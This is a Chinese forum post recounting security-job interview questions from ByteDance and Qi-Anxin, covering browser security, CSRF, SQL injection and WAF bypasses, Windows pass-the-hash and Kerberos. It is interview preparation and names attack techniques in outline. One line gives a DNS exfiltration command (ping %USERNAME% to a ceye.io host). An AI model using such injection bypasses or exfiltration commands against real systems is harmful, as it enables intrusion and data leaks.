拿到了字节跳动-互娱研发前端安全部门的校招offer，有位同学让发一下面经    之前记录下来的，不是记得很全，大家参考一下就好😅     (话说目前部门还在招人，有同学要来吗）           —— 字节跳动 ——     **浏览器安全机制（重点，问了很多个） 如何强制浏览器使用https协议 htsl？ 之前爆出的github返回证书已过期事件 原因 react native框架中xss 进程、线程区别；浏览器多进程 一个tab一个进程，js渲染-线程 透明证书？ csp中nonce只加载部分内联脚本；解决旧网站的不兼容，上报log日志 promise、settimeout异步调用顺序 JS的异步回调机制 https一定安全吗？有没有办法抓包 -> cdn劫持 如何评估网站安全 如何设计网站加密系统用于加密代码中的敏感信息 返回证书错误的原因（证书已过期、证书中域名与服务器不对应、证书不是权威机构发布的） csrf如果是post请求如何攻击（隐藏form表单）  chrome8.1之后csrf的防御，之前的攻击方法无法携带cookie csrf防御的token如何设置 x-frame-option 浏览器cookie相关      考了一道算法题，让用JS写😅但是我说JS不是很熟悉，用了c写           —— 奇安信 ——     1. 命令执行如果遇到windows怎么办（比如dns查询域名可以命令执行 ping %USERNAME%.xxx.ceye.io 2. limit 后怎么注入 3. 过滤了select怎么注入 if盲注 但是只能注入当前表 如果可以堆叠注入的话，可以赋值变量为16进制 4. 不知道列名怎么爆字段；查询information_schema表，这个表无权访问怎么办 5. 怎么绕waf waf - 规则过滤、在沙箱执行语句后过滤返回结果（如果是报错就不返回）、rasp 6. java反序列化漏洞 7. windows PTH、怎么获得域控信息 8. php disablefunction原理 9. sql手工注入判断不同数据库 10. kerbose协议 11. sql注入 识别不同类型数据库 12. https加密 tls1.2 dhcp加密 可以解密吗 13. linux命令执行 空格过滤绕过 14. python变量类型 15. nmap太慢了怎么办           祝各位同学都成功上岸！！[面试必过][顺利签约]（发的好像有点晚了骚瑞